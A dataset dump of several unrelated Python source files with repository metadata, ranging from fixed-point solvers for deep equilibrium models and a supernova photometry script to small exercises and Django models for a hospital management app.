def line_search(update, x0, g0, g, nstep=0, on=True):
"""
`update` is the propsoed direction of update.
Code adapted from scipy.
"""
tmp_s = [0]
tmp_g0 = [g0]
tmp_phi = [torch.norm(g0)**2]
s_norm = torch.norm(x0) / torch.norm(update)
def phi(s, store=True):
if s == tmp_s[0]:
return tmp_phi[0] # If the step size is so small... just return something
x_est = x0 + s * update
g0_new = g(x_est)
phi_new = _safe_norm(g0_new)**2
if store:
tmp_s[0] = s
tmp_g0[0] = g0_new
tmp_phi[0] = phi_new
return phi_new
if on:
s, phi1, ite = scalar_search_armijo(phi, tmp_phi[0], -tmp_phi[0], amin=1e-2)
if (not on) or s is None:
s = 1.0
ite = 0
x_est = x0 + s * update
if s == tmp_s[0]:
g0_new = tmp_g0[0]
else:
g0_new = g(x_est)
return x_est, g0_new, x_est - x0, g0_new - g0, ite
def rmatvec(part_Us, part_VTs, x):
# Compute x^T(-I + UV^T)
# x: (N, L')
# part_Us: (N, L', threshold)
# part_VTs: (N, threshold, L')
if part_Us.nelement() == 0:
return -x
xTU = torch.einsum('bi, bid -> bd', x, part_Us) # (N, threshold)
return -x + torch.einsum('bd, bdi -> bi', xTU, part_VTs) # (N, L')
def matvec(part_Us, part_VTs, x):
# Compute (-I + UV^T)x
# x: (N, L')
# part_Us: (N, L', threshold)
# part_VTs: (N, threshold, L')
if part_Us.nelement() == 0:
return -x
VTx = torch.einsum('bdi, bi -> bd', part_VTs, x) # (N, threshold)
return -x + torch.einsum('bid, bd -> bi', part_Us, VTx) # (N, L')
########################################################################
# Solvers
########################################################################
def forward_iteration(f, x0, max_iter=100, tol=1e-2, stop_mode='rel'):
alternative_mode = 'rel' if stop_mode == 'abs' else 'abs'
trace_dict = {'abs': [],
'rel': []}
lowest_dict = {'abs': 1e8,
'rel': 1e8}
lowest_step_dict = {'abs': 0,
'rel': 0}
for k in range(1, max_iter + 1):
if k == 1:
x = x0
else:
x = f0
f0 = f(x, use_cached=k > 1)
lowest_xest = f0
abs_diff = torch.norm(f0 - x).item()
rel_diff = abs_diff / (torch.norm(f0).item() + 1e-9)
diff_dict = {'abs': abs_diff,
'rel': rel_diff}
trace_dict['abs'].append(abs_diff)
trace_dict['rel'].append(rel_diff)
for mode in ['rel', 'abs']:
if diff_dict[mode] < lowest_dict[mode]:
lowest_dict[mode] = diff_dict[mode]
lowest_step_dict[mode] = k
if mode == stop_mode and lowest_dict[mode] < tol:
lowest_xest = f0
if trace_dict[stop_mode][-1] < tol:
for _ in range(max_iter-1-k):
trace_dict[stop_mode].append(lowest_dict[stop_mode])
trace_dict[alternative_mode].append(lowest_dict[alternative_mode])
break
out = {"result": lowest_xest,
"lowest": lowest_dict[stop_mode],
"nstep": lowest_step_dict[stop_mode],
"prot_break": False,
"abs_trace": trace_dict['abs'],
"rel_trace": trace_dict['rel'],
"tol": tol,
"max_iter": max_iter}
return out
def broyden(f, x0, max_iter=100, tol=1e-2, stop_mode="rel", ls=False):
bsz, seq_len = x0.size()
g = lambda y: f(y) - y
dev = x0.device
alternative_mode = 'rel' if stop_mode == 'abs' else 'abs'
x_est = x0 # (bsz, L')
gx = g(x_est) # (bsz, L')
nstep = 0
tnstep = 0
m = 5
# For fast calculation of inv_jacobian (approximately)
Us = torch.zeros(bsz, seq_len, m).to(dev) # One can also use an L-BFGS scheme to further reduce memory
VTs = torch.zeros(bsz, m, seq_len).to(dev)
update = -matvec(Us[:,:,:nstep], VTs[:,:nstep], gx) # Formally should be -torch.matmul(inv_jacobian (-I), gx)
prot_break = False
# To be used in protective breaks
protect_thres = 1e3 * seq_len
new_objective = 1e8
trace_dict = {'abs': [],
'rel': []}
lowest_dict = {'abs': 1e8,
'rel': 1e8}
lowest_step_dict = {'abs': 0,
'rel': 0}
nstep, lowest_xest, lowest_gx = 0, x_est, gx
for nstep in range(1, max_iter + 1):
x_est, gx, delta_x, delta_gx, ite = line_search(update, x_est, gx, g, nstep=nstep, on=ls)
tnstep += (ite+1)
abs_diff = torch.norm(gx).item()
rel_diff = abs_diff / (torch.norm(gx + x_est).item() + 1e-9)
diff_dict = {'abs': abs_diff,
'rel': rel_diff}
trace_dict['abs'].append(abs_diff)
trace_dict['rel'].append(rel_diff)
for mode in ['rel', 'abs']:
if diff_dict[mode] < lowest_dict[mode]:
if mode == stop_mode:
lowest_xest, lowest_gx = x_est.clone().detach(), gx.clone().detach()
lowest_dict[mode] = diff_dict[mode]
lowest_step_dict[mode] = nstep
new_objective = diff_dict[stop_mode]
if new_objective < tol: break
if new_objective < 3*tol and nstep > 30 and np.max(trace_dict[stop_mode][-30:]) / np.min(trace_dict[stop_mode][-30:]) < 1.3:
# if there's hardly been any progress in the last 30 steps
break
if new_objective > trace_dict[stop_mode][0] * protect_thres:
prot_break = True
break
n = min(nstep - 1, m)
part_Us, part_VTs = Us[:,:,:n], VTs[:,:n]
vT = rmatvec(part_Us, part_VTs, delta_x)
u = (delta_x - matvec(part_Us, part_VTs, delta_gx)) / torch.einsum('bi, bi -> b', vT, delta_gx)[:,None]
vT[vT != vT] = 0
u[u != u] = 0
VTs[:,(nstep-1) % m] = vT
Us[:,:,(nstep-1) % m] = u
update = -matvec(Us[:,:,:n + 1], VTs[:,:n + 1], gx)
# Fill everything up to the threshold length (even if )
for _ in range(max_iter+1-len(trace_dict[stop_mode])):
trace_dict[stop_mode].append(lowest_dict[stop_mode])
trace_dict[alternative_mode].append(lowest_dict[alternative_mode])
return {"result": lowest_xest,
"lowest": lowest_dict[stop_mode],
"nstep": lowest_step_dict[stop_mode],
"prot_break": prot_break,
"abs_trace": trace_dict['abs'],
"rel_trace": trace_dict['rel'],
"tol": tol,
"max_iter": max_iter}
def anderson(f, x0, max_iter=100, tol=1e-2, m=5, lam=1e-4, stop_mode='rel', beta=1.0, **kwargs):
""" Anderson acceleration for fixed point iteration. """
bsz, L = x0.shape
alternative_mode = 'rel' if stop_mode == 'abs' else 'abs'
X = torch.zeros(bsz, m, L, dtype=x0.dtype, device=x0.device)
F = torch.zeros(bsz, m, L, dtype=x0.dtype, device=x0.device)
X[:,0], F[:,0] = x0.reshape(bsz, -1), f(x0).reshape(bsz, -1)
X[:,1], F[:,1] = F[:,0], f(F[:,0].reshape_as(x0)).reshape(bsz, -1)
H = torch.zeros(bsz, m+1, m+1, dtype=x0.dtype, device=x0.device)
H[:,0,1:] = H[:,1:,0] = 1
y = torch.zeros(bsz, m+1, 1, dtype=x0.dtype, device=x0.device)
y[:,0] = 1
trace_dict = {'abs': [],
'rel': []}
lowest_dict = {'abs': 1e8,
'rel': 1e8}
lowest_step_dict = {'abs': 0,
'rel': 0}
for k in range(2, max_iter):
n = min(k, m)
G = F[:,:n]-X[:,:n]
H[:,1:n+1,1:n+1] = torch.bmm(G,G.transpose(1,2)) + lam*torch.eye(n, dtype=x0.dtype,device=x0.device)[None]
alpha = torch.solve(y[:,:n+1], H[:,:n+1,:n+1])[0][:, 1:n+1, 0] # (bsz x n)
X[:,k%m] = beta * (alpha[:,None] @ F[:,:n])[:,0] + (1-beta)*(alpha[:,None] @ X[:,:n])[:,0]
F[:,k%m] = f(X[:,k%m].reshape_as(x0)).reshape(bsz, -1)
gx = (F[:,k%m] - X[:,k%m]).view_as(x0)
abs_diff = gx.norm().item()
rel_diff = abs_diff / (1e-5 + F[:,k%m].norm().item())
diff_dict = {'abs': abs_diff,
'rel': rel_diff}
trace_dict['abs'].append(abs_diff)
trace_dict['rel'].append(rel_diff)
for mode in ['rel', 'abs']:
if diff_dict[mode] < lowest_dict[mode]:
if mode == stop_mode:
lowest_xest = X[:,k%m].view_as(x0).clone().detach()
lowest_dict[mode] = diff_dict[mode]
lowest_step_dict[mode] = k
if trace_dict[stop_mode][-1] < tol:
for _ in range(max_iter-1-k):
trace_dict[stop_mode].append(lowest_dict[stop_mode])
trace_dict[alternative_mode].append(lowest_dict[alternative_mode])
break
out = {"result": lowest_xest,
"lowest": lowest_dict[stop_mode],
"nstep": lowest_step_dict[stop_mode],
"prot_break": False,
"abs_trace": trace_dict['abs'],
"rel_trace": trace_dict['rel'],
"tol": tol,
"max_iter": max_iter}
X = F = None
return out
class DEQBackward(torch.autograd.Function):
@staticmethod
def forward(ctx, f, z):
ctx.save_for_backward(f, z)
return f
@staticmethod
def backward(ctx, grad):
raise NotImplementedError
class OnestepBackward(DEQBackward):
@staticmethod
def backward(ctx, grad):
f, z = ctx.saved_tensors
return autograd.grad(f, z, grad, retain_graph=True)[0] + grad, None
class TwostepBackward(DEQBackward):
@staticmethod
def backward(ctx, grad):
f, z = ctx.saved_tensors
y = grad
for i in range(2):
y = autograd.grad(f, z, y, retain_graph=True)[0] + grad
return y, None
class ForwardIterBackward(DEQBackward):
@staticmethod
def backward(ctx, grad):
f, z = ctx.saved_tensors
tol = 1e-2
solver_stats = forward_iteration(lambda y, use_cached=False : autograd.grad(f, z, y, retain_graph=True)[0] + grad,
grad,
max_iter=100,
tol=tol,
stop_mode='rel')
backward = solver_stats['result']
backward_steps = solver_stats['nstep']
# print("Backward: Iterations {:d}, Error {:e}".format(backward_steps, backward_res))
return backward, None
class AndersonBackward(DEQBackward):
@staticmethod
def backward(ctx, grad):
f, z = ctx.saved_tensors
tol = 1e-2
solver_stats = anderson(lambda y : autograd.grad(f, z, y, retain_graph=True)[0] + grad,
grad,
max_iter=100,
tol=tol,
stop_mode='rel')
backward = solver_stats['result']
backward_res = solver_stats['lowest']
backward_steps = solver_stats['nstep']
# print("Backward: Iterations {:d}, Error {:e}".format(backward_steps, backward_res))
return backward, None
class BroydenBackward(DEQBackward):
@staticmethod
def backward(ctx, grad):
f, z = ctx.saved_tensors
tol = 1e-2
solver_stats = broyden(lambda y : autograd.grad(f, z, y, retain_graph=True)[0] + grad,
grad,
max_iter=100,
tol=tol,
stop_mode='rel')
backward = solver_stats['result']
backward_res = solver_stats['lowest']
backward_steps = solver_stats['nstep']
if backward_res > tol:
print(solver_stats['abs_trace'])
print(solver_stats['rel_trace'])
eye_mat = torch.eye(z.shape[-1]).to(z.device)
# input("Press enter to save grad and jacobian for debugging")
# n_samples = 5000
# indices = np.random.choice(f.shape[0], n_samples, replace=False)
# grad_mat = torch.zeros(n_samples, z.shape[-1], f.shape[-1])
# for j in range(z.shape[-1]):
# grad_mat[:, j] = autograd.grad(f, z, grad_outputs=eye_mat[j].unsqueeze(0).expand_as(z), retain_graph=True)[0][indices]
# np.save('./cache/cached_jac.npy', grad_mat.cpu().numpy())
# np.save('./cache/cached_grad.npy', grad[indices].cpu().numpy())
raise RuntimeError()
# print("Backward: Iterations {:d}, Error {:e}".format(backward_steps, backward_res))
return backward, None
| [
"ericaragorncn@gmail.com"
] | ericaragorncn@gmail.com |
9a9b803419d5990b9026b87d2c0f13bb6ede8384 | 008cb73de02f0ecb445f37a3a7ffe5e5ab85930e | /old/IRphotometry.py | 485bdd8195b0f59e28da93b028e9382b54f36689 | [
"MIT"
] | permissive | pbrown801/aggienova-templates | e3589ada6aa1f2e37492f34a8c3cbe5d1f345e89 | e57bef9b1cec03a39ec83fff5ce9b0832a3073e1 | refs/heads/master | 2023-01-14T02:32:02.314243 | 2022-10-20T22:22:16 | 2022-10-20T22:22:16 | 166,312,098 | 6 | 2 | MIT | 2022-12-27T15:34:55 | 2019-01-17T23:30:10 | Python | UTF-8 | Python | false | false | 2,794 | py | import numpy as np
from spectrophot_array_in import *
from astropy.cosmology import FlatLambdaCDM
import pysynphot as S
cosmo = FlatLambdaCDM(H0=73, Om0=0.3)
F200_wave,F200_tp = np.loadtxt('F200W_NRC_and_OTE_ModAB_mean.txt',dtype=float,
usecols=(0,1), unpack=True,skiprows=1)
F200_filter = [F200_wave, F200_tp] ### tp is throughput
F444_wave,F444_tp = np.loadtxt('F444W_NRC_and_OTE_ModAB_mean.txt',dtype=float,
usecols=(0,1), unpack=True,skiprows=1)
F444_filter = [F444_wave, F444_tp]
F200_bp = S.ArrayBandpass(F200_filter[0],F200_filter[1],name='F200') ###Wavelength in microns
F444_bp = S.ArrayBandpass(F444_filter[0],F444_filter[1],name='F444') ###Wavelength in microns
# this was for testing the spectrophotometry code
# vega_wave,vega_flux = np.loadtxt('spectra/vega.dat',dtype=float,usecols=(0,1),unpack=True)
# Here is the input spectrum and the corresponding distance
input_wave,input_flux = np.loadtxt('spectra/Gaia16apd_uv.dat', dtype=float,usecols=(0,1),unpack=True)
# distance in Megaparsecs, here calculated from redshift for Gaia16apd
distance_sn=cosmo.luminosity_distance(0.102)
#mag_array = [1,1,1,1,1,1];
#mag_array=w_f_in(input_wave,input_flux)
#set redshift array and initialize other arrays which will have the same length
redshifts=[0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1.0,1.1,1.1,1.2,1.3,1.4,1.5,1.6,1.7,1.8,1.9,2.0,2.1]
redshiftmags=[]
distances=[]
lightyears=[]
for counter in range(0,22,1):
z=redshifts[counter]
# calculate distance in Megaparsecs
lumidist = cosmo.luminosity_distance(z)
distances.append(lumidist)
# distances[counter]=lumidist
# lightyears[counter]=lumidist*3.26*10.0**6.0
lightyears.append(lumidist*3.26*10.0**6.0)
# print(lightyears[counter])
# correct for the effects of distance and flux dilution
redshiftedflux = np.multiply(distance_sn**2.0,input_flux)
redshiftedflux = np.divide(redshiftedflux, lumidist**2.0)
redshiftedflux = np.divide(redshiftedflux, 1.0+z)
# print(z)
mag_array=w_f_in(F200_filter[0]*(1.0+z),F200_filter[1])
# print(mag_array[5])
redshiftmags.append(mag_array[5])
# print(redshifts[counter], redshiftmags[counter])
# print(lightyears[counter],redshiftmags[counter])
# print(z,redshifts[counter])
print(redshiftmags)
print(lightyears)
import matplotlib.pyplot as plt
#plt.plot(lightyears,redshiftmags)
##t = np.linspace(1,5,6)
#best fit line and plotting
plt.ylabel('Observed Peak Magnitude (V)')
plt.xlabel('Redshift')
plt.title('Magnitudes versus redshift')
plt.plot(lightyears,redshiftmags,'b*')
plt.plot([4.5, 5.5], [28, 28], color='k', linestyle='--', linewidth=2)
## invert y axis makes the brighter magnitude higher
plt.gca().invert_yaxis()
plt.show()
| [
"peterbrown@byu.net"
] | peterbrown@byu.net |
87375f2c2f39dfe9a1ad71c371098b8f691bf395 | d1d4efba2ef0f8e37fb7d78dfcb007f0fc475093 | /semana_6/programas/00_csv.py | b5bfc3e4e517b5eea10fb340f826899a7b8ebe01 | [] | no_license | mariaelisa492/Fundamentos_python | 4597d3bb3600e245ac769e4b98d09249d56d2473 | 933ad80b502633c26fe2a430a11961272dfaee42 | refs/heads/main | 2023-06-17T00:53:34.867268 | 2021-07-07T20:51:15 | 2021-07-07T20:51:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 857 | py | # -*- coding: utf-8 -*-
"""
libreria csv
"""
# In[]
# persistencia en los datos
import csv
# In[]
# para leer
# open abre y prepara el archivo
archivo = open("arreglo.txt")
# lee lo que hay en el archivo
a = archivo.read()
print(a)
# In[]
# lo divide tomando como referente la ,
b = a.split(",")
print(b)
# In[]
# Para escribir
k = [["e1","e10","e3"],[25,15,65]]
with open('prueba.csv', newline='', mode='w') as file: #w: abre en modo escritura
writer = csv.writer(file)
for i in k:
writer.writerow([i])
# In[]
with open('employee_file.csv', mode='w') as employee_file:
employee_writer = csv.writer(employee_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
employee_writer.writerow(['John Smith', 'Accounting', 'November'])
employee_writer.writerow(['Erica Meyers', 'IT', 'March']) | [
"gomezmunera@corum.org.co"
] | gomezmunera@corum.org.co |
0c1e08fd4a1399434643badb0efceafbc90ea86d | c57d718f1b5f9ccb4e59d202823f1ce8a9515ace | /oo/contas.py | a4c3d399239df5a920ecbcf345c75ae82527c17b | [] | no_license | mvfrasca/Caelum-Python | c01c6b568174e2ed9c9c7e8f86eb0c34f94ea959 | a3da3c0ebc067685d92a791ea3813f69d2566edd | refs/heads/master | 2020-09-29T07:25:12.730291 | 2019-12-20T00:14:01 | 2019-12-20T00:14:01 | 226,986,308 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,312 | py | from collections import MutableSequence
from conta import Conta
class Contas(MutableSequence):
_dados = []
def __len__(self):
return len(self._dados)
def __getitem__(self, posicao):
return self._dados[posicao]
def __setitem__(self, posicao, valor):
if isinstance(valor, Conta):
self._dados[posicao] = valor
else:
raise TypeError("Valor atribuído não é uma conta")
def __delitem__(self, posicao):
del self._dados[posicao]
def insert(self, posicao, valor):
if isinstance(valor, Conta):
return self._dados.insert(posicao, valor)
else:
raise TypeError("Valor atribuído não é uma conta")
if __name__ == '__main__':
import csv
from conta import ContaCorrente
from data import Data
data = Data(16, 12, 2019)
contas = Contas()
arquivo = open('contas.txt', 'r')
leitor = csv.reader(arquivo)
for linha in leitor:
conta = ContaCorrente(linha[0], linha[1], float(linha[2]), float(linha[3]), data)
conta.atualiza(0.0123)
contas.append(conta)
arquivo.close()
print('Saldo\t\tImposto')
print('-----\t\t-------')
for c in contas:
print(f'{c.saldo}\t\t{c.get_valor_imposto()}')
| [
"mvfrasca@gmail.com"
] | mvfrasca@gmail.com |
815daa7a085d07da2383291fdfe140fe3de24d40 | 667f153e47aec4ea345ea87591bc4f5d305b10bf | /Solutions/Ch1Ex005.py | 0a2cd702fe7a62a4875fa2674961e86c12ac5580 | [] | no_license | Parshwa-P3/ThePythonWorkbook-Solutions | feb498783d05d0b4e5cbc6cd5961dd1e611f5f52 | 5694cb52e9e9eac2ab14b1a3dcb462cff8501393 | refs/heads/master | 2022-11-15T20:18:53.427665 | 2020-06-28T21:50:48 | 2020-06-28T21:50:48 | 275,670,813 | 1 | 0 | null | 2020-06-28T21:50:49 | 2020-06-28T21:26:01 | Python | UTF-8 | Python | false | false | 342 | py | # Ch1Ex005.py
# Author: Parshwa Patil
# ThePythonWorkbook Solutions
# Exercise No. 5
# Title: Bottle Deposits
def main():
lessThan1 = int(input("Less than 1 L: "))
moreThan1 = int(input("More than 1 L: "))
refund = (0.1 * lessThan1) + (0.25 * moreThan1)
print("Refund: $" + str(refund))
if __name__ == "__main__": main() | [
"noreply@github.com"
] | Parshwa-P3.noreply@github.com |
8a4708add6cdfe447fdcca3cdccadf54add34fad | 220f1e6f1bd604b0ce452d2337669ad72ef7c11e | /quiz.py | a002fa0a884bdd8c7e27d8c73631451a5e2cfbde | [] | no_license | bikashlama541/RoomA | 9545fa75cf0f02ef4022b692de366423b27d906d | a7f9035ad67ad7cc7e32e2bbb488d65f4ec5c4a1 | refs/heads/master | 2020-07-23T01:29:44.354382 | 2019-09-09T21:45:52 | 2019-09-09T21:45:52 | 207,400,892 | 0 | 1 | null | 2019-09-09T21:45:53 | 2019-09-09T20:42:38 | Python | UTF-8 | Python | false | false | 547 | py | class Question:
def __init__(self, prompt, answer):
self.prompt = prompt
self.answer = answer
questions_prompts = [
"What colors are apple?\n (a) Red/Green\n (b) Orange",
"What colors are bananas?\n (a) Red/Green\n (b)Yellow",
]
questions = [
Question(question_prompts[0], "a"),
Question(question_prompts[1], "b"),
]
def run_quiz(questions):
score = 0
for question in questions:
answer = inputer(question.prompt)
if answer == question.answer:
score +=1
print("You got", score, "out of", len(questions))
run_quiz(questions)
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
4cce4300cd93c522062d17864b7d7b6579a90919 | eaeb685d13ef6c58364c5497c911f3e2f8c49a43 | /Solution/520_Detect_Capital.py | 72853824378aa294f92113350b1c6fc2394d75c7 | [] | no_license | raririn/LeetCodePractice | 8b3a18e34a2e3524ec9ae8163e4be242c2ab6d64 | 48cf4f7d63f2ba5802c41afc2a0f75cc71b58f03 | refs/heads/master | 2023-01-09T06:09:02.017324 | 2020-09-10T02:34:46 | 2020-09-10T02:34:46 | 123,109,055 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 448 | py | class Solution:
def detectCapitalUse(self, word: str) -> bool:
if word.isupper() or word.islower():
return True
elif word[1:].islower() and wprd[0].isupper():
return True
else:
return False
'''
Runtime: 40 ms, faster than 42.73% of Python3 online submissions for Detect Capital.
Memory Usage: 13.8 MB, less than 6.67% of Python3 online submissions for Detect Capital.
''' | [
"raririn.sandbag@gmail.com"
] | raririn.sandbag@gmail.com |
8451258e50d96e33c60b41669ed2db703480788c | c5e4a9a66f686de6eaca331f1ee3823ac925101b | /apps/management/models.py | 56efc0b62de24b22ffdb241452489a41abeab41d | [] | no_license | Tiilon/Hospital_project | b1409be60f0d6daecb0e294bfbe81698d97b7c1f | 6506218f4ad504f9031482999d9b33c92b350df8 | refs/heads/main | 2023-01-23T13:30:11.564836 | 2020-11-24T16:15:12 | 2020-11-24T16:15:12 | 303,461,057 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 12,585 | py | from random import randrange
from django.db import models
from django.conf import settings
from django.utils import timezone
# Create your models here.
class Ward(models.Model):
label = models.CharField(max_length=100, blank=True, null=True)
incharge = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='ward_incharge', blank=True, null=True)
beds= models.ManyToManyField('Bed', related_name='ward_beds', blank=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='wards', blank=True, null=True)
patients= models.ManyToManyField('Patient', related_name='ward_patients', blank=True)
def __str__(self):
return self.label
class meta:
db_table= 'ward'
BED_STATUS = {
('Assigned', 'Assigned'),
('Unassigned', 'Unassigned')
}
class Bed(models.Model):
number = models.CharField(max_length=200, blank=True, null=True)
ward = models.ForeignKey(Ward, on_delete=models.SET_NULL, related_name='bed_ward',blank=True, null=True)
status = models.CharField(max_length=200,blank=True, null=True, choices=BED_STATUS)
allocate = models.ForeignKey('BedAllocate', on_delete=models.SET_NULL, related_name='bed_allocate', blank=True, null=True)
bed_allocates = models.ManyToManyField('BedAllocate', related_name='bed_bed_allocate', blank=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='beds', blank=True, null=True)
def __str__(self):
return self.number
class Meta:
db_table = 'bed'
ordering = ('number',)
class BedAllocate(models.Model):
bed = models.ForeignKey(Bed, related_name='bed_allocate_bed', blank='True', null=True, on_delete=models.SET_NULL)
patient = models.ForeignKey('Patient', related_name='bed_allocate_patient', null=True, blank=True, on_delete=models.SET_NULL)
date_admitted = models.DateField(blank=True, null=True)
time_admitted = models.TimeField(blank=True, null=True)
time_discharged = models.TimeField(blank=True, null=True)
date_discharged = models.DateField(blank=True, null=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='bed_allocates', blank=True, null=True)
def __str__(self):
return f"{self.bed} - {self.patient}"
class Meta:
db_table = 'bed_allocate'
def generate():
FROM = '0123456789'
LENGTH = 10
pat_id = ""
for i in range(LENGTH):
pat_id += FROM[randrange(0, len(FROM))]
return f"PT{pat_id}/{timezone.now().year}"
GENDER = {
('Male', 'Male'),
('Female', 'Female'),
}
PATIENT_TYPE = {
('OPD', 'OPD'),
('Ward', 'Ward'),
('ER', 'EMERGENCY'),
('DISCHARGED', 'DISCHARGED')
}
MARITAL = {
('Married', 'Married'),
('Single', 'Single'),
('Divorced', 'Divorced'),
('Widowed', 'Widowed'),
}
class VitalSign(models.Model):
patient = models.ForeignKey('Patient', on_delete=models.SET_NULL, blank=True, null=True, related_name='vital_sign_patient')
time = models.TimeField(default=timezone.now)
weight = models.DecimalField( max_digits=10, decimal_places=2,blank=True, null=True)
diastolic = models.IntegerField( blank=True, null=True)
pulse = models.IntegerField(blank=True, null=True)
systolic = models.IntegerField( blank=True, null=True)
respiration = models.IntegerField( blank=True, null=True)
temperature = models.DecimalField( max_digits=10, decimal_places=2,blank=True, null=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, blank=True, null=True, related_name='vital_signs')
class Meta:
db_table = 'vital_sign'
ordering = ('-time',)
def __str__(self):
return f"{self.patient.full_name()}-{self.time}"
class Patient(models.Model):
patient_id = models.CharField(default=generate, unique=True, editable=False, max_length=100)
first_name = models.CharField(max_length=100, blank=True, null=True)
last_name = models.CharField(max_length=100, blank=True, null=True)
patient_type = models.CharField(max_length=100, blank=True, null=True, choices=PATIENT_TYPE)
gender = models.CharField(max_length=100, blank=True, null=True, choices=GENDER)
marital_status = models.CharField(max_length=100,blank=True,null=True,choices=MARITAL)
date_of_birth = models.DateField(blank=True, null=True)
date_admitted = models.DateField(blank=True, null=True)
time_admitted = models.TimeField(blank=True, null=True)
time_discharged = models.TimeField(blank=True, null=True)
date_discharged = models.DateField(blank=True, null=True)
bed = models.ForeignKey(Bed, on_delete=models.SET_NULL, related_name='patient_bed', blank=True, null=True)
vital_signs = models.ManyToManyField(VitalSign, related_name='patient_vital_signs', blank=True)
discharged_at = models.DateTimeField(blank=True, null=True)
diagnoses = models.ManyToManyField('MedicalDiagnosis', related_name='patient_diagnosis', blank=True)
notes = models.ManyToManyField('department.Note', related_name='patient_notes', blank=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='patients', blank=True, null=True)
def __str__(self):
return self.patient_id
def full_name(self):
return f"{self.first_name} {self.last_name}"
class Meta:
db_table = 'patient'
class MedicalDiagnosis(models.Model):
patient = models.ForeignKey(Patient, on_delete=models.SET_NULL, related_name='diagnosis_patient', blank=True, null=True)
complaints = models.CharField(max_length=1000, blank=True, null=True)
symptoms = models.CharField(max_length=2000, blank=True, null=True)
diagnosis = models.CharField(max_length=100,blank=True, null=True)
is_admitted = models.BooleanField(blank=True,null=True)
onset = models.CharField(max_length=100, blank=True, null=True)
treatments = models.ManyToManyField('Treatment', related_name='diagnosis_treatments', blank=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='diagnosis', blank=True, null=True)
def __str__(self):
return self.diagnosis
class Meta:
db_table= 'medical diagnosis'
ordering = ('-created_at',)
TREATMENT_STATUS = {
('Pending', 'Pending'),
('Canceled','Canceled'),
('Completed', 'Completed'),
}
class Treatment(models.Model):
diagnosis = models.ForeignKey(MedicalDiagnosis, on_delete=models.SET_NULL, related_name='treatment_diagnosis', blank='null', null=True)
treatment = models.CharField(max_length=2000, blank=True, null=True)
prescription = models.CharField(max_length=2000, blank=True,null=True)
pharmacy_prescription = models.ForeignKey('pharmacy.Prescription', on_delete= models.SET_NULL, related_name='treatment_prescription', blank=True, null=True)
status = models.CharField(max_length=100,blank=True,null=True, choices= TREATMENT_STATUS)
time_treated = models.TimeField(blank=True, null=True)
date_treated= models.DateField(blank=True, null=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='treatments',blank=True, null=True)
def __str__(self):
return str(self.treatment) + ' - ' + str(self.prescription)
class Meta:
db_table = 'treatment'
ordering = ('-created_at',)
COMPLAINTS_STATUS = {
('Pending', 'Pending'),
('Resolved', 'Resolved'),
('Canceled', 'Canceled'),
}
class Complaints(models.Model):
complaints = models.TextField(blank=True, null=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='complaints', blank=False, null=True)
review = models.CharField(max_length=3000, blank=True, null=True)
is_seen = models.BooleanField(blank=True, null=True, default=False)
seen_at = models.DateTimeField(blank=True, null=True)
seen_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='complaint_seen', blank=False, null=True)
status = models.CharField(max_length=200, blank=True, null=True, choices=COMPLAINTS_STATUS)
review_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='complaint_review',blank=False, null=True)
review_at = models.DateTimeField(blank=True, null=True)
class Meta:
ordering = ('-created_at',)
db_table = 'complaint'
def __str__(self):
return str(self.complaints)
DEPARTMENTS ={
('Ward', 'Ward'),
('Pharmacy', 'Pharmacy'),
('Account', 'Account'),
('Management', 'Management'),
('HR', 'Human Resource')
}
REQUEST_STATUS = {
(0, 'Pending'),
(1, 'Accepted'),
(2, 'Rejected')
}
class Request(models.Model):
department = models.CharField(max_length=200, blank=True, null=True, choices=DEPARTMENTS)
description = models.TextField(max_length=5000, blank=True, null=True)
status = models.IntegerField(blank=True, null= True, choices=REQUEST_STATUS)
comments = models.CharField(max_length=1000, blank=True, null=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='requests', blank=True, null=True)
def __str__(self):
return str(self.department)
class Meta:
db_table = 'request'
class Expenditure(models.Model):
category = models.CharField(max_length=100, blank=True, null=True)
item = models.CharField(max_length=300, blank=True, null=True)
total_cost = models.DecimalField(max_digits=10, blank=True, null=True, decimal_places=2)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='expenditures', blank=True, null=True)
def __str__(self):
return f"{self.category} - {self.total_cost}"
class Meta:
db_table = 'expenditure'
class LeavePeriod(models.Model):
start_date = models.DateField(blank=True, null=True)
end_date = models.DateField(blank=True, null=True)
num_of_days = models.IntegerField(default=0)
days_allowed = models.IntegerField(default=0)
staffs = models.ManyToManyField('staff.Staff', related_name='staff', blank='null')
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='leave_periods', blank=True, null=True)
def __str__(self):
return f"{self.start_date}-{self.end_date}"
class Meta:
db_table = 'leave_period'
